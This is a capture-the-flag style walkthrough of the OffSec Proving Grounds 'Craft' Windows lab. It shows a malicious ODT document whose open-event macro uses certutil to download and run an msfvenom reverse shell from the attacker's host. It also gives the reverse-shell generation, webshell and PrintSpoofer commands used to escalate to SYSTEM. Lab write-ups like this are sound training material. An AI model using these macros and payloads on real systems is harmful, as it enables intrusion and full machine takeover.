Craft Walkthrough- Proving Grounds OffSec
I wanted to do another Windows machine as I've been trying to keep up with skills and usage around Windows, not just Linux. I went ahead and ran an nmap scan and only saw one port open which was port 80 and it was running a webserver. No real information from the script and version scans using nmap, so I opened up my web browser and navigated to the page.
I scrolled to the bottom of the page and noticed there was an upload button. I wanted to investigate this further, so I tried uploading a php webshell to see if I could gain access that way.
As you can see, the php webshell was not uploaded. Thankfully the server is very helpful to us as hackers and specifies the filetype needed to alter so that we can gain a shell. It only accepts ODT files which are files from OpenOffice Libre (it's the Linux version of Microsoft Word, Excel, PowerPoint, etc.). I then opened up OpenOffice and created a new document and named it "pingback.odt". From there I went to Tools > Macros > Organize Macros > Basic.
I then went to the main module in module 1 of my file and input a simple ping command via system shell. The intent of this was to test RCE by pinging my own attack machine once. If I was able to capture this ping, I would know that I had RCE and could run any commands I want.
REM ***** BASIC *****
Sub Main
Shell("cmd /c ping -n 1 192.168.45.160")
End Sub
I then saved the macro and exited the macro building page. I then went to Tools > Customize. From there I clicked on the Events tab and clicked on the "Open Document" option and selected "Assign: Macro".
I then selected the macro I just made and clicked ok.
I saved the document and closed OpenOffice. I then ran tcpdump to capture all of the traffic on the tun0 interface to ensure I could see any ping requests.
sudo tcpdump -i tun0 icmpI uploaded the pingback.odt file that I just made to the website, and it worked this time. It said that my document would be reviewed shortly. I was hoping the "person" reviewing would click on our document. A few seconds later I noticed a ping request and ping reply back to the server!
Once I saw this, I knew what I needed to do. I needed to craft a reverse shell, set up a listener and make the user download and run the reverse shell. So I crafted up an msfvenom shell.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.160 LPORT=443 -f exe > shell.exeAfter that, I set up a netcat listener on port 443, and set up an http server on port 80 using python3 in order to download the reverse shell onto the target. I then went back and edited the pingback.odt file to adjust the macro to run a command to download the reverse shell .exe file and then another command to execute the .exe file.
REM ***** BASIC *****
Sub Main
Shell("cmd /c certutil.exe -urlcache -split -f 'http://192.168.45.160/shell.exe' 'C:WindowsTempshell.exe'")
Shell("cmd /c 'C:WindowsTempshell.exe'")
End SubI uploaded the newly modified file to the web page and waited for a few seconds. Not long after uploading I noticed there was a GET request from the server to get the shell.exe file! Right after I saw that I got a reverse shell on the machine.
I checked to see what account I was on, and it was "thecybergeek". I then immediately grabbed PowerUp.ps1 and winPEAS for Windows to see if I could automatically find any priv esc vectors.
certutil -urlcache -f http://192.168.45.160/PowerUp.ps1 "C:UsersthecybergeekDesktopPowerUp.ps1"
certutil -urlcache -f http://192.168.45.160/winPEASany.exe "C:UsersthecybergeekDesktopwinPEASany.exe"I ran an Invoke-AllChecks on PowerUp, but didn't see anything useful. I then ran winPEAS, but I didn't quite see anything immediately. I looked and thought about it for quite some time. I then started thinking about moving to another account as I saw there was an apache account that had a user ID of 1000, which my current user ID was 1001. I wanted to see if they had more privileges than what I had.
I then noticed that I had some write privileges in directories inside the Xampp directory where apache server was being run.
I didn't see anything in that specific folder that I could leverage, so I back tracked to where the server was hosting the actual web pages in the htdocs folder. I ran icacls on it to see that I did have write privileges. I knew this was my avenue for getting the apache user. I just needed to upload a php webshell to this directory and access it from my browser.
I downloaded the webshell using certutil and then accessed the file on my web browser.
certutil -urlcache -f http://192.168.45.160/wshell.php "C:xampphtdocswshell.php"
I checked to make sure I was the apache user, which I was. I then wanted to see if my suspicions were correct in that the apache user had more privileges than the previous account obtained.
As soon as I saw the SeImpersonatePrivilege enabled, I knew exactly what I needed to do to obtain system. I set up a netcat listener on port 443. I then downloaded the same msfvenom shell.exe file I made previously, and PrintSpoofer.exe to the target machine using certutil. I could have just uploaded them to the same directory using the webshell I had, but if you're not using the same webshell, it's a simple way to get the executables onto the machine.
certutil -urlcache -f http://192.168.45.160/PrintSpoofer.exe "C:xampphtdocsPrintSpoofer.exe"
certutil -urlcache -f http://192.168.45.160/shell.exe "C:xampphtdocsshell.exe"From there, I simply ran the following command to get a reverse shell.
PrintSpoofer.exe -i -c shell.exe
I checked my listener, and sure enough, I had a reverse shell as the system.
Overall this box was definitely intermediate rating. It wasn't too terribly difficult, but it did make me think outside the box. Some key takeaways for me to remember is to look at other accounts during priv esc. I forget to do this sometimes and lateral movement on the same machine is sometimes the key. Another would be to not entirely rely on these automated tools to provide the answers. WinPEAS and PowerUp did not really provide me with anything. I had to think about what I had in order to make the next move. Sometimes we get too reliant on these automated scripts and don't see what's right in front of us when the scripts don't work. This was a fun box to do and it definitely helped to brush up on my skillset.
-Sam
